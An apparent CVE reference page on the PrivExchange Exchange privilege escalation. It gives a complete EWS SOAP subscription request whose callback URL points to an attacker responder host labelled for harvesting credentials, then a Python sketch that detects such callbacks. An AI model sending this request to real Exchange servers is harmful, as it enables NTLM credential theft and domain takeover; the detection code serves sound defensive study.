CVE

PrivExchange - Abusing Exchange: One API call away from Domain Admin (CVE-2019-0686 & CVE-2019-0724)

Abusing Exchange - One API call away from Domain Admin
Exploiting PrivExchange

Examples

SOAP request creating subscription to mailbox

POST /ews HTTP/1.1
Host: exchange.example.com
Accept: */*
Accept-Language: nl-nl
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=UTF-8
Content-Length: 934
Connection: close
Referer: https://exchange.example.com/ews
User-Agent: iPhone/11.1

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
    <soap:Header>
        <t:RequestServerVersion Version="Exchange2013" />
    </soap:Header>
    <soap:Body>
        <m:Subscribe>
            <m:PushSubscriptionRequest SubscribeToAllFolders="true">
                <t:EventTypes>
                    <t:EventType>NewMailEvent</t:EventType>
                    <t:EventType>ModifiedEvent</t:EventType>
                    <t:EventType>MovedEvent</t:EventType>
                </t:EventTypes>
                <t:StatusFrequency>1</t:StatusFrequency>
                <t:URL>http://<responder-IP-address>/gibcredsplz_2013_4/</t:URL>
            </m:PushSubscriptionRequest>
        </m:Subscribe>
    </soap:Body>
</soap:Envelope>
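
Detection sketch for the request above (an added example, not part of the original page or of any Exchange tooling): it parses an EWS SOAP body, extracts the push-subscription callback in t:URL, and reports callbacks that leave an approved host list or do not use HTTPS. The allowlisted host name, the finding codes and the sample body are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

NS = {
    "soap": "http://schemas.xmlsoap.org/soap/envelope/",
    "t": "http://schemas.microsoft.com/exchange/services/2006/types",
    "m": "http://schemas.microsoft.com/exchange/services/2006/messages",
}
# Assumption: the only hosts approved to receive EWS push notifications here.
ALLOWED_CALLBACK_HOSTS = frozenset({"notify.corp.example.com"})

# Constructed sample body, same shape as the request above (not captured traffic).
SAMPLE_TEMPLATE = """<soap:Envelope xmlns:soap="{soap}" xmlns:t="{t}" xmlns:m="{m}">
  <soap:Body><m:Subscribe>
    <m:PushSubscriptionRequest SubscribeToAllFolders="true">
      <t:EventTypes><t:EventType>NewMailEvent</t:EventType></t:EventTypes>
      <t:StatusFrequency>1</t:StatusFrequency>
      <t:URL>%s</t:URL>
    </m:PushSubscriptionRequest>
  </m:Subscribe></soap:Body>
</soap:Envelope>""".format(**NS)


def review_ews_body(body, allowed_hosts=ALLOWED_CALLBACK_HOSTS):
    """Return (code, detail) findings for push subscriptions in one EWS body."""
    # SOAP forbids DTDs; refuse them instead of letting the parser expand entities.
    if "<!DOCTYPE" in body or "<!ENTITY" in body:
        return [("rejected-dtd", "")]
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return [("rejected-malformed-xml", str(exc))]
    findings = []
    for req in root.iterfind(".//m:Subscribe/m:PushSubscriptionRequest", NS):
        url = req.findtext("t:URL", default="", namespaces=NS).strip()
        try:
            parts = urlsplit(url)
            host = (parts.hostname or "").lower()
        except ValueError:
            findings.append(("unparseable-callback-url", url))
            continue
        if host not in allowed_hosts:
            findings.append(("unapproved-callback-host", host or url))
        if parts.scheme.lower() != "https":
            findings.append(("callback-not-https", parts.scheme))
    return findings


if __name__ == "__main__":
    for target in ("http://192.0.2.10/hook/", "https://notify.corp.example.com/ews"):
        print(target, "->", review_ews_body(SAMPLE_TEMPLATE % target) or "ok")
```

The same check can run over request bodies taken from a reverse proxy or WAF in front of /ews, where the body is visible before it reaches Exchange.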

URL List